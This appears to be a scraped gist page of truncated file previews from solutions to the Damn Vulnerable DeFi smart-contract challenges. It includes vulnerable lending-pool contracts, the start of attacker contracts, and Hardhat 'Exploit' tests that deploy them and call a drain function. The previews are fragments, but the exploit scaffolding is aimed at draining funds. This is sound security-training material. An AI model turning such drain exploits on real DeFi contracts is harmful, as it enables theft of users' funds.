This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import '@openzeppelin/contracts/token/ERC20/ERC20.sol'; | |
import '@openzeppelin/contracts/access/AccessControl.sol'; | |
/** | |
* @title RewardToken | |
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz) | |
* @dev A mintable ERC20 with 2 decimals to issue rewards |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import '@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol'; | |
import '@openzeppelin/contracts/access/AccessControl.sol'; | |
/** | |
* @title AccountingToken | |
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz) | |
* @notice A limited pseudo-ERC20 token to keep track of deposits and withdrawals |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "../side-entrance/SideEntranceLenderPool.sol"; | |
contract SideEntranceAttack { | |
SideEntranceLenderPool immutable pool; | |
address immutable owner; | |
receive() external payable {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
/** CODE YOUR EXPLOIT HERE */ | |
// Deploy attacker contract | |
const SideEntranceAttack = await ethers.getContractFactory('SideEntranceAttack', attacker) | |
attackContract = await SideEntranceAttack.deploy(this.pool.address) | |
// Log before attack | |
console.log( | |
'POOL BALANCE BEFORE ATTACK: ', | |
String(await ethers.provider.getBalance(this.pool.address)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import '@openzeppelin/contracts/utils/Address.sol'; | |
interface IFlashLoanEtherReceiver { | |
function execute() external payable; | |
} | |
contract SideEntranceLenderPool { | |
using Address for address payable; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
object "Contract" { | |
code { | |
datacopy(0, dataoffset("runtime"), datasize("runtime")) | |
return(0, datasize("runtime")) | |
} | |
object "runtime" { | |
code { | |
if iszero(calledByOwner()) { revert(0, 0) } | |
switch selector() | |
case 0x00 { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* @dev Performs a Solidity function call using a low level `call`. A | |
* plain `call` is an unsafe replacement for a function call: use this | |
* function instead. | |
* | |
* If `target` reverts with a revert reason, it is bubbled up by this | |
* function (like regular Solidity function calls). | |
* | |
* Returns the raw returned data. To convert to the expected return value, | |
* use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
/** CODE YOUR EXPLOIT HERE */ | |
// Deploy attacker contract | |
const TrusterAttack = await ethers.getContractFactory('TrusterAttack', attacker) | |
this.attackContract = await TrusterAttack.deploy(this.token.address, this.pool.address) | |
// Call the drain() function | |
await this.attackContract.connect(attacker).drain() | |
}) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
import "../truster/TrusterLenderPool.sol"; | |
contract TrusterAttack { | |
IERC20 immutable dvt; | |
TrusterLenderPool immutable pool; | |
address immutable owner; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
contract TrusterLenderPool is ReentrancyGuard { | |
using Address for address; |
NewerOlder